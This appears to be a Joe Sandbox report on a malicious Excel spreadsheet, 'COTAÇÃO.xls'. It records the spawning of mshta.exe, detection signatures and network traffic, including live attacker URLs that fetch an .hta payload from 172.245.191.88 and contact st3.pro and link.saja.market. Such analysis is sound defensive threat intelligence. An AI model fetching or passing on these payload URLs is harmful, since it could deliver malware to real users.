Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
COTA#U00c7#U00c3O.xls

Overview

General Information

Sample name:COTA#U00c7#U00c3O.xls
renamed because original name is a hash value
Original sample name:COTAO.xls
Analysis ID:1634262
MD5:3f6b0fddaa94e07440a3890afc3dc99c
SHA1:2c963eb3944bc4be5892e6ef95283e2b8b9bcaf1
SHA256:d4819f6ce1e7c5ed703e11e3ae98ebfb04abe95ac2a221bcc43696de923bdbb2
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Microsoft Office Child Process
AV process strings found (often used to terminate AV products)
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables security privileges
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May use bcdedit to modify the Windows boot settings
One or more processes crash
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w11x64_office
  • EXCEL.EXE (PID: 7468 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 5868 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 8112 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
    • WerFault.exe (PID: 6388 cmdline: C:\Windows\system32\WerFault.exe -u -p 7468 -s 4084 MD5: 5A849C27C4796C1A7C22C572D8EAF95D)
      • EXCEL.EXE (PID: 3716 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /restore MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • WerFault.exe (PID: 2192 cmdline: C:\Windows\system32\WerFault.exe -u -p 7468 -s 1976 MD5: 5A849C27C4796C1A7C22C572D8EAF95D)
  • EXCEL.EXE (PID: 7404 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\COTA#U00c7#U00c3O.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Microsoft Office Child Process
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7468, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 5868, ProcessName: mshta.exe
Sigma detected: Excel Network Connections
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 5.161.200.29, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7468, Protocol: tcp, SourceIp: 192.168.2.26, SourceIsIpv6: false, SourcePort: 49937
Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.26, DestinationIsIpv6: false, DestinationPort: 49937, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7468, Protocol: tcp, SourceIp: 5.161.200.29, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: COTA#U00c7#U00c3O.xlsVirustotal: Detection: 25%Perma Link
Source: COTA#U00c7#U00c3O.xlsReversingLabs: Detection: 21%
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.246.76:443 -> 192.168.2.26:49943 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.76:443 -> 192.168.2.26:49944 version: TLS 1.2

Software Vulnerabilities

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: browser.events.data.msn.cn
Source: global trafficDNS query: name: st3.pro
Source: global trafficDNS query: name: link.saja.market
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49939 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49943 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49944 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49943 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49944 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49944 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49943 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49943 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49944 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49943 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49944 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49943 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49944 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:49937
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:49937
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:49937
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:49937
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:49937
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:49937
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:49937
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:49937
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:49937
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:49937
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:49937
Source: global trafficTCP traffic: 192.168.2.26:49937 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.26:49938
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.26:49938
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.26:49938
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.26:49938
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.26:49938
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.26:49938
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.26:49938
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.26:49938
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.26:49938
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.26:49938
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.26:49938
Source: global trafficTCP traffic: 192.168.2.26:49938 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.26:49939 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 192.168.2.26:49939 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.26:49939 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 192.168.2.26:49939 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.26:49939 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 192.168.2.26:49939 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.26:49939
Source: global trafficTCP traffic: 192.168.2.26:49939 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.26:49939 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.26:49939 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.26:49943 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49944 -> 13.107.246.76:443
Source: global trafficTCP traffic: 13.107.246.76:443 -> 192.168.2.26:49943
Source: global trafficTCP traffic: 13.107.246.76:443 -> 192.168.2.26:49944
Source: global trafficTCP traffic: 192.168.2.26:49943 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49944 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49944 -> 13.107.246.76:443
Source: global trafficTCP traffic: 13.107.246.76:443 -> 192.168.2.26:49944
Source: global trafficTCP traffic: 192.168.2.26:49943 -> 13.107.246.76:443
Source: global trafficTCP traffic: 13.107.246.76:443 -> 192.168.2.26:49943
Source: global trafficTCP traffic: 13.107.246.76:443 -> 192.168.2.26:49943
Source: global trafficTCP traffic: 192.168.2.26:49943 -> 13.107.246.76:443
Source: global trafficTCP traffic: 13.107.246.76:443 -> 192.168.2.26:49944
Source: global trafficTCP traffic: 192.168.2.26:49944 -> 13.107.246.76:443
Source: global trafficTCP traffic: 13.107.246.76:443 -> 192.168.2.26:49943
Source: global trafficTCP traffic: 192.168.2.26:49943 -> 13.107.246.76:443
Source: global trafficTCP traffic: 13.107.246.76:443 -> 192.168.2.26:49944
Source: global trafficTCP traffic: 192.168.2.26:49944 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49943 -> 13.107.246.76:443
Source: global trafficTCP traffic: 192.168.2.26:49944 -> 13.107.246.76:443
Source: Joe Sandbox ViewIP Address: 13.107.246.76 13.107.246.76
Source: Joe Sandbox ViewIP Address: 3.39.89.152 3.39.89.152
Source: Joe Sandbox ViewIP Address: 5.161.200.29 5.161.200.29
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: st3.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /qORxZFFRU3 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: link.saja.market
Source: global trafficHTTP traffic detected: GET /xampp/umo/ncr/onceufeelgood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: st3.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /qORxZFFRU3 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: link.saja.market
Source: global trafficHTTP traffic detected: GET /xampp/umo/ncr/onceufeelgood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.191.88
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yahoo.com/6 equals www.yahoo.com (Yahoo)
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ofilehttps://www.microsoft.comapi.login.yahoo.com equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.cn
Source: global trafficDNS traffic detected: DNS query: st3.pro
Source: global trafficDNS traffic detected: DNS query: link.saja.market
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://172.245.191.88/xampp/umo/ncr/onceufeelgood.hta
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://172.245.191.88/xampp/umo/ncr/onceufeelgood.hta%r
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://localhost:8011accounts.google.comgoogle.commail.google.c
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://olkflt.edog.officeap
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: EXCEL.EXE, 00000000.00000002.4111645029.00000121D5B40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: EXCEL.EXE, 00000000.00000002.4109895942.00000121C9F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspx$
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://weather.service.msn?w2
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://account.box.com/api/wopibootstrapperem4vekradyd8j4setf04baizn2np7btjhttps://www.box.com/offi
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/v2/authQ
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/v2/authhttps://www.googleapis.com/oauth2/v
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA957000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstallednLL
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeintoG
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://analysis.windo
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4129801472.00000121DADBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apis/02
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.3
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.aadrm.
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.aadrm.com
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.aadrm.com/
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.aadrm.come
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.aadrm.comt
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.addins.store.office.com/app/query
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.addins.store.office.com/app/query2$
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.cortana.ai
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnostics.office.comN
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnostics.office.comx
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file5
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/oauth2/get_tokendj0yJmk9QjB
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.microsoftstream.com/api/
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4130078724.00000121DB04D000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4117012927.00000121DA5FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.net
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.net)
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.net3
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.netG
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.netJI-P
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.netK
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.netS
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.neth
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/v1.0/drive/root/root
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/v1.0/shares/ares/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/v1.0/v1.0h
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.comce
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets02Ov
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups/1.2(
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups3.28$
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports(
